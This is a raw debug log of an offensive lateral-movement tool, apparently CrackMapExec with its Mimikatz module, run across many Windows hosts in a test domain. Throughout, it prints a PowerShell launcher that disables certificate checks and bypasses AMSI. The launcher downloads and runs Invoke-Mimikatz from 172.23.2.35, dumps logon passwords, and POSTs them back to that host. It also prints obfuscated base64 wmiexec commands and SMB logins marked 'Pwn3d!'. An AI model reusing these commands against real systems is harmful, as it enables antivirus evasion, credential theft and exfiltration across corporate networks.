[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ AC29.sometarget.com 445 AC29 [+] Executed launcher | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Ow -;sv JC ec;sv tY ((gv Ow).value.toString()+(gv JC).value.toString());powershell (gv tY).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Target system is CDC02.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CDC02[\\PIPE\\atsvc] | |
DEBUG StringBinding: CDC02[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CDC02.sometarget.com[49154] | |
MIMIKATZ CQAS01.sometarget.com 445 CQAS01 [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACDRTSM1.sometarget.com 445 ACDRTSM1 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV2.sometarget.com 445 SRV2 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV1.sometarget.com 445 SRV1 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is ACDRTSM1.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACDRTSM1[\\PIPE\\atsvc] | |
DEBUG StringBinding: ACDRTSM1[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACDRTSM1.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV7.sometarget.com 445 SRV7 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is SRV2.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV2[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV2[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV2.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV3.sometarget.com 445 SRV3 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv nT -;sv CS ec;sv lz ((gv nT).value.toString()+(gv CS).value.toString());powershell (gv lz).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Target system is SRV3.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV3[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV3[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV3.sometarget.com[49154] | |
DEBUG Target system is SRV7.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV7[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV7[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV7.sometarget.com[49154] | |
DEBUG Target system is SRV1.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV1[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV1[49155] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV1.sometarget.com[49155] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
MIMIKATZ AC51.sometarget.com 445 AC51 [+] Executed launcher | |
MIMIKATZ ACTSMPROX.sometarget.com 445 ACTSMPROX [+] Executed launcher | |
MIMIKATZ 172.23.2.72 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB TLCANISTER.sometarget.com 445 TLCANISTER [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CDRDC01.sometarget.com 445 CDRDC01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is TLCANISTER.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\TLCANISTER[\\PIPE\\atsvc] | |
DEBUG StringBinding: tlcanister[49154] | |
